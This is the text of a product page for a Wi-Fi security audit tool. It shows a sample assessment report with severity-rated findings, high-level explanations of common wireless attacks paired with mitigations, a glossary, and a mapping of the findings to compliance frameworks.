Access your Wi-Fi security audit workspace
All sessions are logged and audited · TLS 1.3 encrypted
NetGuard helps network owners identify vulnerabilities, detect weak encryption, and generate actionable remediation reports — for networks you own and operate.
Capabilities
A complete toolkit for understanding and improving the security posture of networks you're responsible for.
Detect WEP, WPA, WPA2, and WPA3 configurations. Flag deprecated or insecure encryption protocols with severity ratings.
Evaluate password strength of owner-supplied credentials against dictionaries, complexity rules, and entropy analysis — nothing is sent externally.
Weighted risk scoring across encryption, authentication, firmware, configuration, and network isolation categories.
Generate signed PDF audit reports with executive summaries, technical findings, risk matrices, and prioritized remediation steps.
Map your network's security posture against PCI-DSS, ISO 27001, NIST SP 800-153, and SOC 2 Type II requirements.
Identify unauthorized access points broadcasting SSIDs that match your network names — a common attack vector for credential harvesting.
Process
A structured, auditable workflow designed for network administrators and security teams.
Network: CORP-WIFI-MAIN · Last scan: 2 hours ago
Analyze a network you own or are authorized to assess
Used locally only for configuration analysis. Never transmitted externally.
Analyzed locally in-browser for strength scoring. Not stored.
Configure your network settings and start an assessment to see results here.
Enter your current Wi-Fi or router password below to see its security strength. Analysis is performed locally — the password never leaves your device.
Audit trail and exportable compliance documents
CORP-WIFI-MAIN · Generated October 14, 2025 · Version 3.2
A security assessment of the CORP-WIFI-MAIN wireless network was conducted on October 14, 2025 by admin@corp.local under authorization from IT Director J. Okonkwo. The network received an overall security score of 64/100 (Fair), with 3 critical vulnerabilities requiring immediate remediation.
The most significant risks are: WPS PIN attack surface, an unpatched firmware with a known CVE, and a weak router admin password. These issues collectively could allow an attacker with physical proximity to gain administrative access to the network infrastructure.
| Finding | Severity | CVSS | Status | Fix by |
|---|---|---|---|---|
| WPS PIN enabled | Critical | 9.3 | Open | Immediate |
| CVE-2023-41183 firmware RCE | Critical | 9.8 | Open | Immediate |
| Weak admin credential | Critical | 8.1 | Open | 24 hours |
| SSID information disclosure | Medium | 4.3 | Open | 7 days |
| Guest VLAN not isolated | Medium | 5.9 | Open | 7 days |
| 802.11r fast roaming | Low | 2.1 | Review | 30 days |
| WPA2-AES encryption active | Pass | — | Resolved | — |
| Management HTTPS enforced | Pass | — | Resolved | — |
Understand Wi-Fi security concepts and best practices
An attacker within Wi-Fi range can capture the 4-way WPA2 handshake (or PMKID without client interaction) and perform offline dictionary attacks. A weak passphrase can be cracked in hours using GPU clusters. Mitigation: use 15+ character passphrases or upgrade to WPA3.
Attacker broadcasts an access point with the same SSID as a legitimate network, often with higher power. Clients auto-connect, and the attacker performs man-in-the-middle interception. Mitigation: use enterprise 802.1X authentication; rogue AP detection systems; WPA3-SAE (resistant to MITM credential harvesting).
WPS PIN authentication is limited to 10,000 combinations due to split-digit validation. The Pixie Dust attack exploits weak random number generators in router chips and can recover the WPS PIN offline in seconds. Mitigation: disable WPS PIN entirely in all router configurations.
802.11 deauthentication frames are unauthenticated — any attacker can broadcast them, forcing clients to disconnect. This is also used to capture handshakes on demand. Mitigation: enable 802.11w Management Frame Protection (MFP), mandatory in WPA3.
| Term | Definition |
|---|---|
| PMK | Pairwise Master Key — derived from the passphrase and SSID during WPA2 authentication |
| PMKID | A hash value in the first EAPOL frame that allows offline dictionary attacks without capturing a full 4-way handshake |
| SAE | Simultaneous Authentication of Equals — WPA3's password-based authentication protocol with forward secrecy |
| SSID | Service Set Identifier — the human-readable name of a wireless network broadcast in beacon frames |
| TKIP | Temporal Key Integrity Protocol — WPA's original encryption, now deprecated due to attack vulnerabilities |
| CCMP | Counter Mode CBC-MAC Protocol — WPA2's AES-based encryption, considered secure when properly configured |
| WPS | Wi-Fi Protected Setup — a simplified network connection protocol with known PIN brute-force vulnerabilities |
| 802.11w | IEEE amendment providing cryptographic protection for management frames, preventing deauthentication attacks |
| MFP | Management Frame Protection — Cisco term for 802.11w, protects deauth/disassoc frames |
| KRACK | Key Reinstallation Attack — a WPA2 vulnerability allowing nonce reuse by replaying cryptographic handshake messages |
| Pixie Dust | An offline WPS PIN attack exploiting weak random number generation in router firmware |
| EAP | Extensible Authentication Protocol — framework used in 802.1X enterprise Wi-Fi authentication |
| RADIUS | Remote Authentication Dial-In User Service — a centralized authentication server used in enterprise Wi-Fi (802.1X/WPA-Enterprise) |
| Evil Twin | A rogue access point broadcasting the same SSID as a legitimate network to intercept client traffic |
| VLAN | Virtual Local Area Network — logical network segmentation used to isolate guest networks from internal infrastructure |
Wi-Fi security requirements across major frameworks
Payment Card Industry Data Security Standard
| Requirement | Description | Status |
|---|---|---|
| Req 1.3.2 | Wireless networks not connected to CDE must be verified as isolated from CDE | Pass |
| Req 4.2.1 | Strong cryptography — WPA2/WPA3 for all wireless transmissions in CDE scope | Pass |
| Req 6.3.3 | All software/firmware protected from known vulnerabilities via security patches | Fail — CVE-2023-41183 |
| Req 8.3.9 | Passwords/passphrases for user accounts must meet complexity and length requirements | Fail — weak admin password |
| Req 11.2.1 | Authorized and unauthorized wireless access points are identified and managed | Review needed |
| Req 11.2.2 | An inventory of authorized wireless access points is maintained | Pass |
Guidelines for Securing Wireless Local Area Networks
| Control | Description | Status |
|---|---|---|
| SC-8 | Transmission confidentiality and integrity — WPA2/WPA3 AES required | Pass |
| SI-2 | Flaw remediation — vulnerabilities must be patched within defined timelines | Fail |
| IA-5 | Authenticator management — minimum password complexity enforced | Fail |
| AC-17 | Remote access — remote management interfaces secured and audited | Pass |
| AU-2 | Event logging — wireless access events logged and retained | Pass |
Information Security Management Systems
| Control | Annex A Reference | Status |
|---|---|---|
| A.8.20 | Networks security — implement controls to protect networks and network services | Pass |
| A.8.21 | Security of network services — security mechanisms for all network services | Partial |
| A.8.22 | Segregation of networks — groups of services, users, and systems segregated | Fail — guest isolation |
| A.8.8 | Management of technical vulnerabilities — timely identification and remediation | Fail |
| A.5.14 | Information transfer — protect information in transit | Pass |